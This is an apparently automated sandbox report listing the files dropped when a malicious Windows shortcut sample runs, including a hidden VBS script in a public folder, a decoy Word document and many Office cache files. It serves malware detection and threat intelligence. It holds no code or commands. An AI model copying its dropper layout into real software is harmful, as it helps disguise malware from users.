Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

XA5hQdlKVd.lnk

MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Fri Aug 4 04:10:09 2023, mtime=Fri Aug 4 04:10:09 2023, atime=Fri Aug 4 04:10:09 2023, length=0, window=hide

initial sample

C:\Users\Public\Libraries\Libraries.vbs

ASCII text, with very long lines (600), with CRLF line terminators

dropped

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\ProgramData\Microsoft\Network\Downloader\edb.log

data

dropped

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Extensible storage user DataBase, version 0x620, checksum 0xfb2c0f78, page size 16384, DirtyShutdown, Windows version 10.0

dropped

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

data

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

XML 1.0 document, ASCII text, with very long lines (2008), with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

JSON data

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Mangal\39115645384.ttf

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Mangal\41732083461.ttf

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D7E5FE39-EC50-4509-AAE8-3FCD60368C7D}.tmp

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703090517522300_968E6B0F-5509-4DEA-BFB7-6B9402BE175F.log

data

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703090518086800_968E6B0F-5509-4DEA-BFB7-6B9402BE175F.log

data

dropped

C:\Users\user\AppData\Local\Temp\Return.docx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCDF018.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF018.tmp\ConvergingText.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF029.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF029.tmp\sist02.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF02B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF02B.tmp\iso690nmerical.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF05B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF05B.tmp\gb.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF06C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF06C.tmp\gostname.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF06D.tmp\APASixthEditionOfficeOnline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF06D.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF081.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF081.tmp\turabian.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF092.tmp\BracketList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF092.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF093.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF093.tmp\ieee2006officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF0B8.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF0B8.tmp\pictureorgchart.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF0CD.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF0CD.tmp\InterconnectedBlockProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF0E2.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF0E2.tmp\chicago.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF0F3.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF0F3.tmp\mlaseventheditionofficeonline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF104.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF104.tmp\RadialPictureList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF105.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF105.tmp\TabbedArc.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF116.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF116.tmp\rings.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF136.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF136.tmp\Text Sidebar (Annual Report Red and Black design).docx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCDF137.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF137.tmp\VaryingWidthList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF148.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF148.tmp\ThemePictureGrid.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF16A.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF16A.tmp\Equations.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCDF18A.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF18A.tmp\architecture.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF18B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF18B.tmp\harvardanglia2008officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF1AC.tmp\Banded.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF1AC.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF1DC.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF1DC.tmp\Element design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCDF1DD.tmp\CircleProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF1DD.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF1EE.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF1EE.tmp\TabList.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF1EF.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF1EF.tmp\iso690.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF20F.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF20F.tmp\chevronaccent.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF211.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF211.tmp\HexagonRadial.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF212.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF212.tmp\ThemePictureAlternatingAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF232.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF232.tmp\PictureFrame.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF233.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF233.tmp\gosttitle.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF245.tmp\Dividend.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF245.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF266.tmp\Basis.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF266.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF277.tmp\Frame.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF277.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF2A9.tmp\Wood_Type.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF2A9.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF2CA.tmp\Metropolitan.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF2CA.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF2EA.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCDF2EA.tmp\ThemePictureAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF36A.tmp\View.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF36A.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF39A.tmp\Parallax.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF39A.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF39B.tmp\Parcel.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF39B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF3CC.tmp\Quotable.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF3CC.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF48B.tmp\Berlin.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF48B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF4BA.tmp\Savon.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF4BA.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF568.tmp\Gallery.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF568.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF684.tmp\Circuit.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCDF684.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF770.tmp\Droplet.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF770.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF88C.tmp\Slate.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF88C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF8DB.tmp\Damask.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF8DB.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDF9A8.tmp\Mesh.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDF9A8.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDFA76.tmp\Main_Event.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDFA76.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDFC0E.tmp\Vapor_Trail.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCDFC0E.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCDFDB6.tmp\Content.inf

data

modified

C:\Users\user\AppData\Local\Temp\TCDFDB6.tmp\Insight design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cflee3n.fai.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vhbg40v.bqh.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezdkck5x.dsf.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yz42ofw0.1n5.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\cabEFDF.tmp

Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF0.tmp

Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF1.tmp

Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF2.tmp

Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF3.tmp

Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF4.tmp

Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF5.tmp

Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF6.tmp

Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabEFF7.tmp

Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF007.tmp

Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF02A.tmp

Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF06B.tmp

Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF07E.tmp

Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF07F.tmp

Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF080.tmp

Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF091.tmp

Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF094.tmp

Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0A5.tmp

Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0A6.tmp

Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0A7.tmp

Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0B9.tmp

Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0BA.tmp

Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0BB.tmp

Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0BC.tmp

Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0BD.tmp

Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0CE.tmp

Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0CF.tmp

Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0D0.tmp

Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0D1.tmp

Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF0F4.tmp

Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF149.tmp

Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF169.tmp

Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF19C.tmp

Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF210.tmp

Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF244.tmp

Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF246.tmp

Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF288.tmp

Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF289.tmp

Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF2B9.tmp

Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF359.tmp

Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF35A.tmp

Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF39C.tmp

Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF469.tmp

Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF46A.tmp

Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF519.tmp

Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF654.tmp

Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF730.tmp

Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF82C.tmp

Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF83D.tmp

Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabF94A.tmp

Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabFA17.tmp

Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabFBBF.tmp

Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cabFD57.tmp

Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\~$Return.docx

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

Microsoft OOXML

dropped

